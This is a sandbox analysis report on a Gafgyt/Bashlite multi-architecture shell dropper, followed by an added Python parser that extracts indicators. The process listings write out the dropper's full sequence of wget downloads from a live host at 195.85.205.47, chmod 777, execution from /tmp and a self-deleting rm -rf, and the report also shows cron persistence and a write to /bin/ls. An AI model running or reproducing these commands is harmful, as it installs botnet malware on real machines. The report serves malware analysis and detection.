Analysis Overview
SHA256
ac40e30ea6ab94b1102940d16c575f7c87dbe6335530e37f568c4ac2d967f53d
Threat Level: Known bad
The file qkdjdjj22.sh was found to be: Known bad.
Malicious Activity Summary
Gafgyt/Bashlite
Detected Gafgyt variant
Executes dropped EXE
Reads system routing table
Creates/modifies Cron job
Writes file to system bin folder
Reads system network configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-02 05:54
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
debian9-mipsel-20240611-en
Max time kernel
145s
Max time network
148s
Command Line
Signatures
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mpsl | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.mpsl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
/tmp/qkdjdjj22.x32
[./qkdjdjj22.x32]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.i586]
/bin/chmod
[chmod 777 qkdjdjj22.i586]
/tmp/qkdjdjj22.i586
[./qkdjdjj22.i586]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.m68k]
/bin/chmod
[chmod 777 qkdjdjj22.m68k]
/tmp/qkdjdjj22.m68k
[./qkdjdjj22.m68k]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm4]
/bin/chmod
[chmod 777 qkdjdjj22.arm4]
/tmp/qkdjdjj22.arm4
[./qkdjdjj22.arm4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
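The process listing above is the entire dropper logic: for every architecture tag it runs wget against the same host, chmod 777 on the download, executes it from /tmp, and at the end rm -rf's all of the payloads together with the script itself. Two details are easy to miss when reading it by hand: the second wget of qkdjdjj22.ppc lands as qkdjdjj22.ppc.1 (wget's default rename when the target name already exists, which is why ppc.1 shows up in the tmp-write table and in the rm list), and qkdjdjj22.arm5 is fetched but never chmod'd or executed before the cleanup runs. The following parser is an added example for this report, not part of the sandbox output: it turns a listing in this two-line format into IOCs and flags the wget, chmod 777, execute-from-/tmp chain. PROCESS_TREE is a transcribed excerpt of the listing above (the mips iteration, the two ppc iterations, the arm5 fetch and the cleanup); the function names and the chain heuristic are this example's own.

```python
"""Extract IOCs and the drop chain from a sandbox process listing.

Added example for this report. PROCESS_TREE is an excerpt transcribed from the
behavioral4 process listing (image path on one line, argv in brackets on the
next); everything else here (function names, the chain heuristic) is this
example's own choice, not the sandbox's.
"""
from collections import Counter
from urllib.parse import urlparse

PROCESS_TREE = """\
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.ppc]
/bin/chmod
[chmod 777 qkdjdjj22.ppc]
/tmp/qkdjdjj22.ppc
[./qkdjdjj22.ppc]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm5]
/bin/rm
[rm -rf qkdjdjj22.arm4 qkdjdjj22.arm6 qkdjdjj22.i586 qkdjdjj22.m68k qkdjdjj22.mips qkdjdjj22.mpsl qkdjdjj22.ppc qkdjdjj22.ppc.1 qkdjdjj22.sh qkdjdjj22.sh4 qkdjdjj22.x32 qkdjdjj22.x86]
"""


def parse_tree(text):
    """Turn the two-line-per-process listing into (image, argv) pairs."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    procs = []
    for image, cmd in zip(lines[0::2], lines[1::2]):
        argv = cmd[1:-1].split()  # drop the surrounding [ ] and split on spaces
        procs.append((image, argv))
    return procs


def extract_iocs(procs):
    """Collect download hosts/URLs, arch tags, and what the cleanup removed."""
    urls, executed, removed = [], [], []
    for image, argv in procs:
        if argv and argv[0] == "wget":
            urls += [a for a in argv[1:] if a.startswith("http")]
        elif image.startswith("/tmp/") and argv and argv[0].startswith("./"):
            executed.append(argv[0][2:])
        elif argv and argv[0] == "rm":
            removed += [a for a in argv[1:] if not a.startswith("-")]
    fetched = [u.rsplit("/", 1)[1] for u in urls]
    dropper = next((img.rsplit("/", 1)[1] for img, _ in procs if img.endswith(".sh")), None)
    return {
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "urls": urls,
        "arch_tags": sorted({f.rsplit(".", 1)[1] for f in fetched}),
        "refetched": sorted(n for n, c in Counter(fetched).items() if c > 1),
        "fetched_not_executed": sorted(set(fetched) - set(executed)),
        "removed": removed,
        "self_deleted": dropper in removed,
    }


def detect_drop_chains(procs):
    """Flag wget -> chmod 777 -> execute-from-/tmp sequences on the same name."""
    chains = []
    for i in range(len(procs) - 2):
        (_, a), (_, b), (img, c) = procs[i], procs[i + 1], procs[i + 2]
        if not (a and a[0] == "wget" and b[:2] == ["chmod", "777"]):
            continue
        name = a[-1].rsplit("/", 1)[-1]
        if b[2:] == [name] and img == "/tmp/" + name and c == ["./" + name]:
            chains.append(name)
    return chains


if __name__ == "__main__":
    procs = parse_tree(PROCESS_TREE)
    for key, value in extract_iocs(procs).items():
        print(f"{key}: {value}")
    print("drop chains:", detect_drop_chains(procs))
```

Run against the full listing the same functions report twelve wget calls, ten distinct payload names executed, arm5 as the one fetched-but-not-run file, and the script's own name in the rm list, which is what makes the sample a self-deleting multi-arch dropper rather than a single-payload loader.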
Network
| Country | Destination | Domain | Proto |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:80 | 195.85.205.47 | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
| TR | 195.85.205.47:777 | N/A | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-02 05:54
Reported
2024-07-02 05:56
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fileJho6MR | /tmp/fileJho6MR | N/A |
| N/A | /tmp/filevTFhk3 | /tmp/filevTFhk3 | N/A |
| N/A | /tmp/filemoTV0H | /tmp/filemoTV0H | N/A |
| N/A | /tmp/filemf5pux | /tmp/filemf5pux | N/A |
| N/A | /tmp/filezwRxwh | /tmp/filezwRxwh | N/A |
| N/A | /tmp/file8FktrW | /tmp/file8FktrW | N/A |
| N/A | /tmp/fileg8yT9O | /tmp/fileg8yT9O | N/A |
| N/A | /tmp/filef9VCKz | /tmp/filef9VCKz | N/A |
| N/A | /tmp/fileAwhu1d | /tmp/fileAwhu1d | N/A |
| N/A | /tmp/fileokqn75 | /tmp/fileokqn75 | N/A |
| N/A | /tmp/fileVGk0HK | /tmp/fileVGk0HK | N/A |
| N/A | /tmp/fileqcFGiv | /tmp/fileqcFGiv | N/A |
| N/A | /tmp/file2jWCUi | /tmp/file2jWCUi | N/A |
| N/A | /tmp/fileBz8oDT | /tmp/fileBz8oDT | N/A |
| N/A | /tmp/filenniY0H | /tmp/filenniY0H | N/A |
| N/A | /tmp/fileIwkh7m | /tmp/fileIwkh7m | N/A |
| N/A | /tmp/fileteLex4 | /tmp/fileteLex4 | N/A |
| N/A | /tmp/filenedGUR | /tmp/filenedGUR | N/A |
| N/A | /tmp/file6VXMex | /tmp/file6VXMex | N/A |
| N/A | /tmp/filew50Oyk | /tmp/filew50Oyk | N/A |
| N/A | /tmp/fileFmjhi3 | /tmp/fileFmjhi3 | N/A |
| N/A | /tmp/filewPck2K | /tmp/filewPck2K | N/A |
| N/A | /tmp/file6sOBaB | /tmp/file6sOBaB | N/A |
| N/A | /tmp/filefkDICi | /tmp/filefkDICi | N/A |
| N/A | /tmp/file3J2Nd9 | /tmp/file3J2Nd9 | N/A |
| N/A | /tmp/fileQGbeHL | /tmp/fileQGbeHL | N/A |
| N/A | /tmp/filenoKEBq | /tmp/filenoKEBq | N/A |
| N/A | /tmp/fileftbCGc | /tmp/fileftbCGc | N/A |
| N/A | /tmp/filey8hRDP | /tmp/filey8hRDP | N/A |
| N/A | /tmp/fileGtV1PD | /tmp/fileGtV1PD | N/A |
| N/A | /tmp/filethlCNg | /tmp/filethlCNg | N/A |
| N/A | /tmp/fileWYbBRU | /tmp/fileWYbBRU | N/A |
| N/A | /tmp/filemSUsWJ | /tmp/filemSUsWJ | N/A |
| N/A | /tmp/fileTDRill | /tmp/fileTDRill | N/A |
| N/A | /tmp/file3uxPvb | /tmp/file3uxPvb | N/A |
| N/A | /tmp/fileK2GtNR | /tmp/fileK2GtNR | N/A |
| N/A | /tmp/filebjs9Px | /tmp/filebjs9Px | N/A |
| N/A | /tmp/file19a5Kp | /tmp/file19a5Kp | N/A |
| N/A | /tmp/filesATcHW | /tmp/filesATcHW | N/A |
| N/A | /tmp/fileYsSZ0F | /tmp/fileYsSZ0F | N/A |
| N/A | /tmp/filevINkRc | /tmp/filevINkRc | N/A |
| N/A | /tmp/fileHknWj4 | /tmp/fileHknWj4 | N/A |
| N/A | /tmp/file49kSUK | /tmp/file49kSUK | N/A |
| N/A | /tmp/filezzTlep | /tmp/filezzTlep | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenniY0H | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filesATcHW | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileHknWj4 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file49kSUK | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/qkdjdjj22.x86 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileg8yT9O | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileqcFGiv | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file2jWCUi | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filezwRxwh | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filew50Oyk | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filevINkRc | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filey8hRDP | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileTDRill | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileK2GtNR | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileWYbBRU | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filef9VCKz | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileVGk0HK | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenedGUR | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filenoKEBq | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filethlCNg | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filemSUsWJ | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileBz8oDT | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileFmjhi3 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filefkDICi | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileftbCGc | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileIwkh7m | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3J2Nd9 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileQGbeHL | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileAwhu1d | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileokqn75 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileteLex4 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file6VXMex | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filevTFhk3 | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filemoTV0H | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filemf5pux | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file8FktrW | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileGtV1PD | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file3uxPvb | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileYsSZ0F | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file19a5Kp | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/fileJho6MR | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filewPck2K | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/file6sOBaB | N/A |
| File opened for modification | /etc/cron.hourly/0 | /tmp/filebjs9Px | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.x32 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.i586 | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /bin/ls | /tmp/qkdjdjj22.x86 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.x32 | N/A |
| File opened for reading | /proc/net/route | /tmp/qkdjdjj22.i586 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/fileFmjhi3 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filethlCNg | N/A |
| File opened for reading | /proc/self/exe | /tmp/filesATcHW | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileHknWj4 | N/A |
| File opened for reading | /proc/self/exe | /tmp/qkdjdjj22.x86 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileJho6MR | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileg8yT9O | N/A |
| File opened for reading | /proc/self/exe | /tmp/file6sOBaB | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileQGbeHL | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileGtV1PD | N/A |
| File opened for reading | /proc/self/exe | /tmp/file19a5Kp | N/A |
| File opened for reading | /proc/self/exe | /tmp/filemf5pux | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileBz8oDT | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileIwkh7m | N/A |
| File opened for reading | /proc/self/exe | /tmp/filewPck2K | N/A |
| File opened for reading | /proc/self/exe | /tmp/filefkDICi | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3J2Nd9 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filey8hRDP | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileYsSZ0F | N/A |
| File opened for reading | /proc/self/exe | /tmp/filemoTV0H | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenniY0H | N/A |
| File opened for reading | /proc/self/exe | /tmp/file6VXMex | N/A |
| File opened for reading | /proc/self/exe | /tmp/file49kSUK | N/A |
| File opened for reading | /proc/self/exe | /tmp/file8FktrW | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileWYbBRU | N/A |
| File opened for reading | /proc/self/exe | /tmp/filebjs9Px | N/A |
| File opened for reading | /proc/self/exe | /tmp/filef9VCKz | N/A |
| File opened for reading | /proc/self/exe | /tmp/file2jWCUi | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileVGk0HK | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileqcFGiv | N/A |
| File opened for reading | /proc/self/exe | /tmp/filew50Oyk | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenoKEBq | N/A |
| File opened for reading | /proc/self/exe | /tmp/filemSUsWJ | N/A |
| File opened for reading | /proc/self/exe | /tmp/filevTFhk3 | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileAwhu1d | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileokqn75 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filezzTlep | N/A |
| File opened for reading | /proc/self/exe | /tmp/file3uxPvb | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileK2GtNR | N/A |
| File opened for reading | /proc/self/exe | /tmp/filevINkRc | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileteLex4 | N/A |
| File opened for reading | /proc/self/exe | /tmp/filenedGUR | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileftbCGc | N/A |
| File opened for reading | /proc/self/exe | /tmp/filezwRxwh | N/A |
| File opened for reading | /proc/self/exe | /tmp/fileTDRill | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/file3uxPvb | /tmp/fileTDRill | N/A |
| File opened for modification | /tmp/file19a5Kp | /tmp/filebjs9Px | N/A |
| File opened for modification | /tmp/filesATcHW | /tmp/file19a5Kp | N/A |
| File opened for modification | /tmp/fileHknWj4 | /tmp/filevINkRc | N/A |
| File opened for modification | /tmp/qkdjdjj22.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileVGk0HK | /tmp/fileokqn75 | N/A |
| File opened for modification | /tmp/fileIwkh7m | /tmp/filenniY0H | N/A |
| File opened for modification | /tmp/filezzTlep | /tmp/file49kSUK | N/A |
| File opened for modification | /tmp/filemf5pux | /tmp/filemoTV0H | N/A |
| File opened for modification | /tmp/file8FktrW | /tmp/filezwRxwh | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filevTFhk3 | /tmp/fileJho6MR | N/A |
| File opened for modification | /tmp/fileg8yT9O | /tmp/file8FktrW | N/A |
| File opened for modification | /tmp/fileqcFGiv | /tmp/fileVGk0HK | N/A |
| File opened for modification | /tmp/filenoKEBq | /tmp/fileQGbeHL | N/A |
| File opened for modification | /tmp/fileGtV1PD | /tmp/filey8hRDP | N/A |
| File opened for modification | /tmp/qkdjdjj22.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filew50Oyk | /tmp/file6VXMex | N/A |
| File opened for modification | /tmp/file6sOBaB | /tmp/filewPck2K | N/A |
| File opened for modification | /tmp/filevINkRc | /tmp/fileYsSZ0F | N/A |
| File opened for modification | /tmp/file3J2Nd9 | /tmp/filefkDICi | N/A |
| File opened for modification | /tmp/fileK2GtNR | /tmp/file3uxPvb | N/A |
| File opened for modification | /tmp/fileteLex4 | /tmp/fileIwkh7m | N/A |
| File opened for modification | /tmp/filewPck2K | /tmp/fileFmjhi3 | N/A |
| File opened for modification | /tmp/fileftbCGc | /tmp/filenoKEBq | N/A |
| File opened for modification | /tmp/filemoTV0H | /tmp/filevTFhk3 | N/A |
| File opened for modification | /tmp/filezwRxwh | /tmp/filemf5pux | N/A |
| File opened for modification | /tmp/filemSUsWJ | /tmp/fileWYbBRU | N/A |
| File opened for modification | /tmp/qkdjdjj22.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filebjs9Px | /tmp/fileK2GtNR | N/A |
| File opened for modification | /tmp/fileYsSZ0F | /tmp/filesATcHW | N/A |
| File opened for modification | /tmp/filenedGUR | /tmp/fileteLex4 | N/A |
| File opened for modification | /tmp/fileTDRill | /tmp/filemSUsWJ | N/A |
| File opened for modification | /tmp/filef9VCKz | /tmp/fileg8yT9O | N/A |
| File opened for modification | /tmp/fileQGbeHL | /tmp/file3J2Nd9 | N/A |
| File opened for modification | /tmp/fileJho6MR | /tmp/qkdjdjj22.x86 | N/A |
| File opened for modification | /tmp/qkdjdjj22.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/filey8hRDP | /tmp/fileftbCGc | N/A |
| File opened for modification | /tmp/filethlCNg | /tmp/fileGtV1PD | N/A |
| File opened for modification | /tmp/file49kSUK | /tmp/fileHknWj4 | N/A |
| File opened for modification | /tmp/qkdjdjj22.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/qkdjdjj22.ppc.1 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileokqn75 | /tmp/fileAwhu1d | N/A |
| File opened for modification | /tmp/fileBz8oDT | /tmp/file2jWCUi | N/A |
| File opened for modification | /tmp/filenniY0H | /tmp/fileBz8oDT | N/A |
| File opened for modification | /tmp/file2jWCUi | /tmp/fileqcFGiv | N/A |
| File opened for modification | /tmp/fileFmjhi3 | /tmp/filew50Oyk | N/A |
| File opened for modification | /tmp/filefkDICi | /tmp/file6sOBaB | N/A |
| File opened for modification | /tmp/fileWYbBRU | /tmp/filethlCNg | N/A |
| File opened for modification | /tmp/filefjW10d | /tmp/filezzTlep | N/A |
| File opened for modification | /tmp/fileAwhu1d | /tmp/filef9VCKz | N/A |
| File opened for modification | /tmp/file6VXMex | /tmp/filenedGUR | N/A |
Processes
/tmp/qkdjdjj22.sh
[/tmp/qkdjdjj22.sh]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mips]
/bin/chmod
[chmod 777 qkdjdjj22.mips]
/tmp/qkdjdjj22.mips
[./qkdjdjj22.mips]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.mpsl]
/bin/chmod
[chmod 777 qkdjdjj22.mpsl]
/tmp/qkdjdjj22.mpsl
[./qkdjdjj22.mpsl]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.sh4]
/bin/chmod
[chmod 777 qkdjdjj22.sh4]
/tmp/qkdjdjj22.sh4
[./qkdjdjj22.sh4]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x86]
/bin/chmod
[chmod 777 qkdjdjj22.x86]
/tmp/qkdjdjj22.x86
[./qkdjdjj22.x86]
/tmp/fileJho6MR
[./qkdjdjj22.x86]
/tmp/filevTFhk3
[./qkdjdjj22.x86]
/tmp/filemoTV0H
[./qkdjdjj22.x86]
/tmp/filemf5pux
[./qkdjdjj22.x86]
/tmp/filezwRxwh
[./qkdjdjj22.x86]
/tmp/file8FktrW
[./qkdjdjj22.x86]
/tmp/fileg8yT9O
[./qkdjdjj22.x86]
/tmp/filef9VCKz
[./qkdjdjj22.x86]
/tmp/fileAwhu1d
[./qkdjdjj22.x86]
/tmp/fileokqn75
[./qkdjdjj22.x86]
/tmp/fileVGk0HK
[./qkdjdjj22.x86]
/tmp/fileqcFGiv
[./qkdjdjj22.x86]
/tmp/file2jWCUi
[./qkdjdjj22.x86]
/tmp/fileBz8oDT
[./qkdjdjj22.x86]
/tmp/filenniY0H
[./qkdjdjj22.x86]
/tmp/fileIwkh7m
[./qkdjdjj22.x86]
/tmp/fileteLex4
[./qkdjdjj22.x86]
/tmp/filenedGUR
[./qkdjdjj22.x86]
/tmp/file6VXMex
[./qkdjdjj22.x86]
/tmp/filew50Oyk
[./qkdjdjj22.x86]
/tmp/fileFmjhi3
[./qkdjdjj22.x86]
/tmp/filewPck2K
[./qkdjdjj22.x86]
/tmp/file6sOBaB
[./qkdjdjj22.x86]
/tmp/filefkDICi
[./qkdjdjj22.x86]
/tmp/file3J2Nd9
[./qkdjdjj22.x86]
/tmp/fileQGbeHL
[./qkdjdjj22.x86]
/tmp/filenoKEBq
[./qkdjdjj22.x86]
/tmp/fileftbCGc
[./qkdjdjj22.x86]
/tmp/filey8hRDP
[./qkdjdjj22.x86]
/tmp/fileGtV1PD
[./qkdjdjj22.x86]
/tmp/filethlCNg
[./qkdjdjj22.x86]
/tmp/fileWYbBRU
[./qkdjdjj22.x86]
/tmp/filemSUsWJ
[./qkdjdjj22.x86]
/tmp/fileTDRill
[./qkdjdjj22.x86]
/tmp/file3uxPvb
[./qkdjdjj22.x86]
/tmp/fileK2GtNR
[./qkdjdjj22.x86]
/tmp/filebjs9Px
[./qkdjdjj22.x86]
/tmp/file19a5Kp
[./qkdjdjj22.x86]
/tmp/filesATcHW
[./qkdjdjj22.x86]
/tmp/fileYsSZ0F
[./qkdjdjj22.x86]
/tmp/filevINkRc
[./qkdjdjj22.x86]
/tmp/fileHknWj4
[./qkdjdjj22.x86]
/tmp/file49kSUK
[./qkdjdjj22.x86]
/tmp/filezzTlep
[./qkdjdjj22.x86]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.arm6]
/bin/chmod
[chmod 777 qkdjdjj22.arm6]
/tmp/qkdjdjj22.arm6
[./qkdjdjj22.arm6]
/usr/bin/wget
[wget http://195.85.205.47/qkdjdjj22.x32]
/bin/chmod
[chmod 777 qkdjdjj22.x32]
